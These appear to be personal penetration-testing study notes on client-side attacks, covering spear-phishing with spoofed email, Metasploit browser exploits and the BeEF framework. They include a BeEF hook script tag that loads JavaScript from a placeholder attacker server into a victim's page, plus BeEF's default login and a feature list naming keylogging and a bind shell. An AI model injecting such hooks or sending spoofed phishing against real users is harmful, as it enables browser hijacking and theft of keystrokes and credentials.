Kali进行web渗透笔记(九)

Exploiting the Client Using Attack Frameworks

spear-phing e-mail attack:Choosing your own mail server has one distinct advantage:it allows you to spoof an e-mail address and,if the victim’s mail server does not performs reverse DNS lookups,the e-mail is sure to hit the victim’s mailbox.

Metasploit browser exploit

Browser exploitation framework(BeEf):exploiting XSS flaws,the tool can also make web browsers attack other websites using injected JavaScript.

The BeEF attack platform can generate and deliver payloads directly to the target web browser.an attractive tool for social engineering attacks are the different types of modules,and its ability to control many web browsers at the same time using something known as a hook.

BeEF consists of two major components:

A server application that manages the hooked clients,also known as zombies .

A JavaScript hook that runs in the web browser of the victim

An example of a hook is shown in the following code .This code iss injected in a HTML file that is downloaded by the web browser:

<script type="text/javascript" src="http://<BeEF_server_IP>:3000/hook.js></script>"

The default username and password to log into the web interface is beef.

Some of the features and usses og the BeEF tool are listed as follows:

Port scanner

Key Logger

Browsser information gathering

Bind shell

Network Mapping

Metasploit integration